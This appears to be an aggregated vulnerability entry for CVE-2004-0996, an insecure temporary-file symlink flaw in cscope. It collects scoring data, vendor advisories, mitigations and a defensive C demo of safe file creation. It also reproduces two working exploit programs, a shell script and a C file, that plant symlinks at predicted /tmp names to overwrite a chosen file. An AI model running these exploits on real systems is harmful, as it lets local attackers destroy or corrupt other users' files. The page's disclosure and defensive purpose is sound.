CVE-2004-0996
CVSS 2.1
Published: 2005-01-10 00:00:00
Revised: 2016-10-17 22:50:33

[Original] main.c in cscope 15-4 and 15-5 creates temporary files with predictable filenames, which allows local users to overwrite arbitrary files via a symlink attack.


[CNNVD] Cscope main.c file overwrite vulnerability (CNNVD-200501-203)

        Cscope is an open-source text-mode source code browser.
        Because of a design flaw, main.c in Cscope 15-4 and 15-5 allows arbitrary files to be overwritten.
        main.c creates its temporary files under predictable names, so a local user can plant a symbolic link at such a name and have cscope overwrite an arbitrary file through it.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no special access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/o:gentoo:linux  (Gentoo Linux)
cpe:/o:debian:debian_linux:3.0::ia-32
cpe:/o:debian:debian_linux:3.0::ppc
cpe:/o:debian:debian_linux:3.0::arm
cpe:/o:debian:debian_linux:3.0::mipsel
cpe:/a:cscope:cscope:15.3
cpe:/o:debian:debian_linux:3.0::hppa
cpe:/a:cscope:cscope:15.4
cpe:/a:cscope:cscope:15.5
cpe:/o:debian:debian_linux:3.0::ia-64
cpe:/o:debian:debian_linux:3.0::mips
cpe:/a:cscope:cscope:13.0
cpe:/o:sco:unixware:7.1.1
cpe:/o:debian:debian_linux:3.0::alpha
cpe:/o:sco:unixware:7.1.3
cpe:/a:cscope:cscope:15.1
cpe:/o:debian:debian_linux:3.0::m68k
cpe:/o:sco:unixware:7.1.4
cpe:/o:debian:debian_linux:3.0::sparc
cpe:/o:debian:debian_linux:3.0  (Debian Linux 3.0)
cpe:/o:debian:debian_linux:3.0::s-390

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0996
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0996
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-203
(official data source) CNNVD

- Other links and resources

http://docs.info.apple.com/article.html?artnum=306172
(UNKNOWN)  CONFIRM  http://docs.info.apple.com/article.html?artnum=306172
http://lists.apple.com/archives/security-announce//2007/Jul/msg00004.html
(UNKNOWN)  APPLE  APPLE-SA-2007-07-31
http://marc.info/?l=bugtraq&m=110133485519690&w=2
(UNKNOWN)  BUGTRAQ  20041124 STG Security Advisory: [SSA-20041122-09] cscope insecure temp file creation vulnerability
http://www.debian.org/security/2004/dsa-610
(VENDOR_ADVISORY)  DEBIAN  DSA-610
http://www.gentoo.org/security/en/glsa/glsa-200412-11.xml
(UNKNOWN)  GENTOO  GLSA-200412-11
http://www.securityfocus.com/archive/1/381443
(UNKNOWN)  BUGTRAQ  20041117 RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/archive/1/381506
(UNKNOWN)  BUGTRAQ  20041118 Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/archive/1/381611
(UNKNOWN)  BUGTRAQ  20041118 Re: RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
http://www.securityfocus.com/bid/11697
(VENDOR_ADVISORY)  BID  11697
http://www.securityfocus.com/bid/25159
(UNKNOWN)  BID  25159
http://www.vupen.com/english/advisories/2007/2732
(UNKNOWN)  VUPEN  ADV-2007-2732
http://xforce.iss.net/xforce/xfdb/18125
(VENDOR_ADVISORY)  XF  cscope-tmp-race-condition(18125)

- Vulnerability information (CNNVD)

Cscope main.c file overwrite vulnerability
Low severity  Design error
2005-01-10 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        The vendor has released an updated release that fixes this issue; it can be obtained from:
        http://sourceforge.net/projects/cscope/files/

- Vulnerability information (EDB 24749)

Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1) (EDBID:24749)
linux local
2004-11-17 Verified
0 Gangstuck
source: http://www.securityfocus.com/bid/11697/info

Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it. 

During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it. 

Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application. 

Versions up to and including Cscope 15.5 are reported vulnerable.

#!/bin/sh
#################################################################
# RXcscope_proof.sh
# brute force case baby
# cscope advisory and exploit by Gangstuck / Psirac <research@rexotec.com>
#################################################################
# Pre-creates symlinks /tmp/cscope<pid>.1 and /tmp/cscope<pid>.2 for a window
# of upcoming pids, so that a cscope started by another user lands on one of
# them and overwrites <file1> through the link.

HOWM=${2:-30}                           # number of pids to cover (default 30)
CURR=$$                                 # our own pid: a recently allocated one
NEXT=`expr $CURR + 5 + $HOWM \* 2 + 1`  # guess where cscope's pid will fall
LAST=`expr $NEXT + $HOWM`

printf '\n--= Cscope Symlink Vulnerability Exploitation =--\n'
printf '                 [versions 15.5 and minor]\n'
printf '                   Gangstuck / Psirac\n'
printf '                 <research@rexotec.com>\n\n'

if [ $# -lt 1 ]; then
        echo "Usage: $0 <file1> [number_of_guesses]"
        exit 1
fi

rm -f /tmp/cscope*

echo "Probed next process id ........ [${NEXT}]"

# consecutive pids alternate between the .1 and .2 suffixes cscope uses
while [ "$NEXT" -lt "$LAST" ]; do
        ln -s "$1" /tmp/cscope${NEXT}.1; NEXT=`expr $NEXT + 1`
        ln -s "$1" /tmp/cscope${NEXT}.2; NEXT=`expr $NEXT + 1`
done


- Vulnerability information (EDB 24750)

Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (2) (EDBID:24750)
linux local
2004-11-17 Verified
0 Gangstuck
source: http://www.securityfocus.com/bid/11697/info
/* RXcscope exploit version 15.5 and minor */
/* Plants symlinks at <P_tmpdir>/cscope<pid>.1 / .2 for each pid in a window
 * after our own, so that a cscope later started under one of those pids
 * opens the link and overwrites <target> through it. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE   64

int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];

        fprintf(stdout, "\n     --[ Cscope Exploit ]--\n"
                        "     version 15.5 and minor \n"
                        "       Gangstuck / Psirac\n"
                        "     <research@rexotec.com>\n\n");

        if (ac != 3 || atoi(av[2]) <= 0) {
                fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
                return 1;
        }

        cur=getpid();                /* freshly allocated pid: cscope's will follow soon */
        lst=cur+atoi(av[2]);         /* end of the pid window to cover */

        fprintf(stdout, " -> Current process id is ..... [%5d]\n"
                        " -> Last process id is ........ [%5d]\n", (int)cur, lst);

        /* suffix alternates 1,2,1,2,... as cscope's does; a failed symlink()
         * (name already taken) is deliberately ignored */
        while (++cur != lst) {
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, (int)cur, (i==2) ? --i : ++i);
                symlink(av[1], buffer);
        }

        return 0;
}

- Vulnerability information (PacketStorm F37095)

SCOSA-2005.11.txt (PacketStormID:F37095)
2005-04-18 00:00:00
advisory,local
CVE-2004-0996

SCO Security Advisory - cscope creates temporary files with an easily predictable file name. A local attacker could exploit this vulnerability and possibly gain elevated privileges on the system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



______________________________________________________________________________

			SCO Security Advisory

Subject:		OpenServer 5.0.6 OpenServer 5.0.7 : cscope local attacker can remove arbitrary files
Advisory number: 	SCOSA-2005.11
Issue date: 		2005 April 7
Cross reference:	sr892180 fz530504 erg712739 CAN-2004-0996
______________________________________________________________________________


1. Problem Description

	cscope is a developer's tool for browsing source code.

	cscope creates temporary files with an easily predictable
	file name. A local attacker could exploit this vulnerability
	and possibly gain elevated privileges on the system. 

	The Common Vulnerabilities and Exposures project (cve.mitre.org)
	has assigned the name CAN-2004-0996 to this issue.


2. Vulnerable Supported Versions

	System				Binaries
	----------------------------------------------------------------------
	OpenServer 5.0.6 		/usr/ccs/bin/cscope
	OpenServer 5.0.7		/usr/ccs/bin/cscope 

3. Solution

	The proper solution is to install the latest packages.

4. OpenServer 5.0.6

	4.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.11

	4.2 Verification

	MD5 (VOL.000.000) = 1fb21699e2a86a2aeb390a57219ff567

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	4.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the directory as the location of the
	images.


5. OpenServer 5.0.7

	5.1 Location of Fixed Binaries

	ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.11

	5.2 Verification

	MD5 (VOL.000.000) = 1fb21699e2a86a2aeb390a57219ff567

	md5 is available for download from
		ftp://ftp.sco.com/pub/security/tools

	5.3 Installing Fixed Binaries

	Upgrade the affected binaries with the following sequence:

	1) Download the VOL* files to a directory

	2) Run the custom command, specify an install from media
	images, and specify the directory as the location of the
	images.


6. References

	Specific references for this advisory:
		http://xforce.iss.net/xforce/xfdb/18125 
		http://www.securityfocus.com/bid/11697 
		http://marc.theaimsgroup.com/?l=bugtraq&m=110133485519690&w=2 
		http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0996

	SCO security resources:
		http://www.sco.com/support/security/index.html

	SCO security advisories via email
		http://www.sco.com/support/forums/security.html

	This security fix closes SCO incidents sr892180 fz530504
	erg712739.


7. Disclaimer

	SCO is not responsible for the misuse of any of the information
	we provide on this website and/or through our security
	advisories. Our advisories are a service to our customers
	intended to promote secure installation and use of SCO
	products.


8. Acknowledgments

	SCO would like to thank Gangstuck / Psirac <research@rexotec.com>
	who disclosed this vulnerability. Jeremy Bae from STG
	Security Inc <swbae@stgsecurity.com> also disclosed this
	vulnerability to the vendor.

______________________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (SCO/SYSV)

iD8DBQFCVY+taqoBO7ipriERAqV1AJ9efhMnTGgI0X0i+9u69ESgLpF8xgCeI8Jj
e3dYzV4evbTDaDlU3X3QJfw=
=DCWX
-----END PGP SIGNATURE-----    

- Vulnerability information (OSVDB 11919)

11919
Cscope Tempfile Symlink Arbitrary File Deletion
Local Access Required / Race Condition
Loss of Integrity
Exploit Public / Vendor Verified

- Description

Cscope contains a flaw that may allow a malicious user to predict an upcoming temporary filename and use a symlink attack to cause corruption and removal of arbitrary system files. The product utilizes the directory found in the environment variable "TMPDIR" to store its temporary files. During creation of these temporary files, cscope adheres to a predictable naming scheme for the filenames and does not check for an existing file by the chosen name. This issue may result in a loss of integrity.
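As an added illustration (this is not cscope's code and not from any advisory on this page), the following C program contrasts the creation pattern the description above ascribes to cscope, a name built from the pid with no check for an existing entry, with the O_CREAT|O_EXCL / mkstemp() form that defeats a planted link. The scratch directory, the victim file, the "cscope<pid>.<n>" naming (taken from the exploits on this page) and the run_demo harness are all constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Naming scheme reproduced from the exploits on this page: "<tmpdir>/cscope<pid>.<n>".
 * Anyone who can guess the victim's pid can precompute this path. */
int predictable_name(char *out, size_t len, const char *tmpdir, pid_t pid, int n)
{
    return snprintf(out, len, "%s/cscope%d.%d", tmpdir, (int)pid, n);
}

/* Vulnerable pattern (the behaviour the advisories describe): create by the
 * precomputed name with no check for an existing entry. fopen(..., "w") follows
 * a symlink and truncates its target, so a planted link redirects the write. */
int unsafe_create(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fputs(data, f);
    fclose(f);
    return 0;
}

/* Hardened pattern: mkstemp() chooses an unpredictable suffix and opens with
 * O_CREAT|O_EXCL, which fails with EEXIST if anything already occupies the path,
 * a symlink included, wherever it points. template_path must end in "XXXXXX"
 * and is overwritten with the name actually used. Returns the open fd or -1. */
int safe_create(char *template_path, const char *data)
{
    int fd = mkstemp(template_path);
    if (fd < 0)
        return -1;
    if (write(fd, data, strlen(data)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

static int read_small(const char *path, char *buf, size_t len)
{
    FILE *f = fopen(path, "r");
    if (f == NULL)
        return -1;
    size_t n = fread(buf, 1, len - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (int)n;
}

/* Demonstration in a private scratch directory (constructed for this example, not
 * the shared /tmp): plant a symlink at the predictable name, then run both creation
 * routines against it. *unsafe_clobbered = 1 if the victim file was overwritten
 * through the link; *excl_refused = 1 if O_CREAT|O_EXCL rejected the planted link.
 * Returns 0, or -1 if setup failed. */
int run_demo(int *unsafe_clobbered, int *excl_refused)
{
    const char *base = getenv("TMPDIR");
    char dir[128], victim[192], planted[192], tmpl[192], buf[32];
    int fd;
    snprintf(dir, sizeof dir, "%s/cscope-demo-XXXXXX", base ? base : "/tmp");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    if (unsafe_create(victim, "original") != 0)
        return -1;

    /* Attacker: guess the pid cscope will run under and pre-create the link. */
    predictable_name(planted, sizeof planted, dir, getpid() + 1, 1);
    if (symlink(victim, planted) != 0)
        return -1;

    /* Victim, vulnerable code path: the write lands in victim.txt. */
    unsafe_create(planted, "clobbered");
    read_small(victim, buf, sizeof buf);
    *unsafe_clobbered = (strcmp(buf, "clobbered") == 0);

    /* Victim, hardened code path: the planted link is refused ... */
    fd = open(planted, O_WRONLY | O_CREAT | O_EXCL, 0600);
    *excl_refused = (fd < 0 && errno == EEXIST);
    if (fd >= 0)
        close(fd);

    /* ... and mkstemp() never lands on a name the attacker could guess. */
    snprintf(tmpl, sizeof tmpl, "%s/cscope.XXXXXX", dir);
    fd = safe_create(tmpl, "safe");
    if (fd >= 0) {
        close(fd);
        unlink(tmpl);
    }
    unlink(planted);
    unlink(victim);
    rmdir(dir);
    return 0;
}

int main(void)
{
    int clobbered = 0, refused = 0;
    if (run_demo(&clobbered, &refused) != 0) {
        perror("demo setup");
        return 1;
    }
    printf("fopen(\"w\") wrote through the planted link: %s\n", clobbered ? "yes" : "no");
    printf("O_CREAT|O_EXCL refused the planted link:  %s\n", refused ? "yes" : "no");
    return 0;
}
```

Build with cc -o cscope-demo cscope-demo.c and run it. The demo uses a private 0700 directory so the vulnerable write actually goes through; on the real /tmp, Linux 3.6 and later with fs.protected_symlinks=1 refuses to follow a symlink in a sticky, world-writable directory unless the link's owner matches the process or the directory owner, which blunts this class of attack even for unfixed programs. The TMPDIR workaround quoted later in this entry works for the same reason: a directory only its owner can write to gives an attacker nowhere to plant the link.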

- Timeline

2004-11-08  2003-05-21
2004-11-17  Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: a user setting his/her "TMPDIR" environment variable to a more trusted location such as "~/tmp" should mitigate some risk. The workaround only helps if that directory is not writable by other local users, since the attack depends on being able to plant a link where cscope will create its files.

- References

- Author

- Vulnerability information (BID 11697)

Cscope Insecure Temporary File Creation Vulnerabilities
Class: Design Error  Bugtraq ID: 11697
Remote: No  Local: Yes
Published: 2004-11-17 12:00:00  Updated: 2007-08-02 05:25:00
Gangstuck / Psirac <research@rexotec.com> disclosed this vulnerability. Jeremy Bae from STG Security Inc <swbae@stgsecurity.com> also disclosed this vulnerability to the vendor.

- Affected product versions

SCO Unixware 7.1.4
SCO Unixware 7.1.3
SCO Unixware 7.1.1
Gentoo Linux
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0
Cscope Cscope 15.5
+ SCO Open Server 5.0.7
+ SCO Open Server 5.0.6
Cscope Cscope 15.4
Cscope Cscope 15.3
Cscope Cscope 15.1
Cscope Cscope 13.0
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.10
Apple Mac OS X 10.3.9

- Discussion

Cscope creates temporary files in an insecure way. A design error causes the application to fail to verify the presence of a file before writing to it.

During execution, the utility reportedly creates temporary files in the system's temporary directory, '/tmp', with predictable names. This allows attackers to create malicious symbolic links that Cscope will write to when an unsuspecting user executes it.

Attackers may leverage these issues to overwrite arbitrary files with the privileges of an unsuspecting user that activates the vulnerable application.

Versions up to and including Cscope 15.5 are reported vulnerable.

- Exploit

Although an exploit is not required, example programs have been provided:

- Solution

Please see the referenced advisories for more information.

Apple Mac OS X 10.3.9
Apple Mac OS X Server 10.3.9
Apple Mac OS X 10.4.10
Apple Mac OS X Server 10.4.10
Cscope Cscope 15.3
SCO Unixware 7.1.1
SCO Unixware 7.1.3
SCO Unixware 7.1.4
